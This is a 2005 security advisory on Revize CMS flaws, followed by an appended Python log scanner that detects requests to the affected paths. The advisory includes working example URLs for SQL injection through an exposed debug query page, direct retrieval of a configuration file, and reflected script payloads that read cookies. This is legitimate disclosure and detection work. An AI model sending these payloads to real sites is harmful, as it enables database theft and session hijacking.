revizeSQL.txt

20 Nov 2005 | Reported by Lostmon | Type: packetstorm | Source: packetstormsecurity.com

The Revize(r) Web Content Management System allows SQL information disclosure and XS

Code
` #######################################################  
Revize(r) CMS SQL information disclosure and XSS  
Vendor url:http://www.idetix.com  
Advisory: http://lostmon.blogspot.com/2005/11/revizer-cms-sql-information-disclosure.html  
Vendor notify: exploit available:yes  
#######################################################  
  
The Revize(r) Web Content Management System enables  
non-technical content contributors to quickly and easily  
keep their Web Pages up-to-date. Revize can be applied  
to a sophisticated, mature site or to the development of  
a new Web Site from the ground up. And Revize is powerful  
enough to manage Web content for any large organization.  
Or, Revize can be localized into one or more departments.  
  
The input passed to the "query" parameter in "query_results.jsp"  
isn't properly sanitised before being used in a SQL query.  
This can be exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
  
This may allow a remote attacker to execute or manipulate SQL  
queries in the backend database.  
  
A remote user can obtain sensitive data about the target  
system by directly requesting 'revize.xml', located in the  
'conf' directory. The normal URL for this flaw is:  
http://[victim]/revize/conf/  
  
#################  
version  
#################  
  
Unknown version of Revize(r) CMS  
  
##################  
solution  
##################  
  
No solution at this time.  
  
###################  
Timeline  
###################  
  
Discovered: 02-11-2005  
vendor notify:14-11-2005  
vendor response:  
disclosure:16-11-2005  
  
#######################  
examples  
#######################  
  
SQL command:  
  
http://[Victim]/revize/debug/query_results.jsp?  
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects  
  
http://[Victim]/revize/debug/query_results.jsp?query=  
select%20*%20from%20pbpublic.rSubjects  
  
http://[Victim]/revize/debug/query_input.jsp?  
table=rSubjects&apptable&webspace=REVIZE  
  
Admin bypass?  
  
http://[Victim]/revize/debug/  
  
When we are at this URL, the page has a login form for  
access, but if we click any link we can obtain some  
relevant information about the site without needing to log in.  
  
  
http://[Victim]/revize/debug/apptables.html  
http://[Victim]/revize/debug/main.html  
  
#####################  
cross site scripting  
#####################  
  
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/  
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3  
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap  
=subject&error=admincenter/login.jsp  
  
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/  
admincenter/setWebSpace.jsp&action=login&resourcetype=security  
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/  
script%3E&error=admincenter/login.jsp  
  
http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/  
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.  
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap  
=subject&error=admincenter/login.jsp  
  
  
################### €nd ############################  
  
Thanks to estrella for being my light  
  
Sincerely:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
Curiosity is what moves the mind....  
`
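
An added detection example (not part of the original advisory and not Revize code): a scanner that flags web-server log entries touching the paths and parameters this advisory names. The combined access-log format, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths from the advisory's example URLs; compared case-insensitively.
DEBUG_PREFIX = "/revize/debug/"
CONF_PREFIX = "/revize/conf/"
SERVLET_PATH = "/revize/HTTPTranslatorServlet".lower()

SQL_RE = re.compile(r"^\s*(select|insert|update|delete|drop|alter|create)\b", re.I)
MARKUP_RE = re.compile(r"[<>\"]")  # characters that should never reach these parameters
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qsl(parts.query, keep_blank_values=True)  # values come back URL-decoded
    findings = set()
    if path.startswith(DEBUG_PREFIX):
        findings.add("debug-console-access")
        if any(k == "query" and SQL_RE.search(v) for k, v in params):
            findings.add("sql-in-query-param")
    if path.startswith(CONF_PREFIX):
        findings.add("conf-dir-access")
    if path == SERVLET_PATH and any(MARKUP_RE.search(v) for _, v in params):
        findings.add("markup-in-servlet-param")
    return sorted(findings)

def scan(lines):
    """Yield (line_number, findings) for every log line with at least one finding."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = classify(m.group(1)) if m else []
        if hits:
            yield n, hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2005:10:00:00 +0000] "GET /revize/debug/query_results.jsp?webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects HTTP/1.1" 200 5120',
    '192.0.2.10 - - [20/Nov/2005:10:00:05 +0000] "GET /revize/conf/revize.xml HTTP/1.1" 200 2048',
    '192.0.2.11 - - [20/Nov/2005:10:01:00 +0000] "GET /revize/HTTPTranslatorServlet?action=login&resourcetype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Esecurity HTTP/1.1" 200 900',
    '192.0.2.12 - - [20/Nov/2005:10:02:00 +0000] "GET /revize/HTTPTranslatorServlet?action=login&resourcetype=security&objectmap=subject HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```

Any hit on the debug or conf prefixes from outside an administrative network is worth reviewing, since the advisory lists no vendor fix; blocking those two directories at the web server or reverse proxy removes the exposure the first two findings track.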
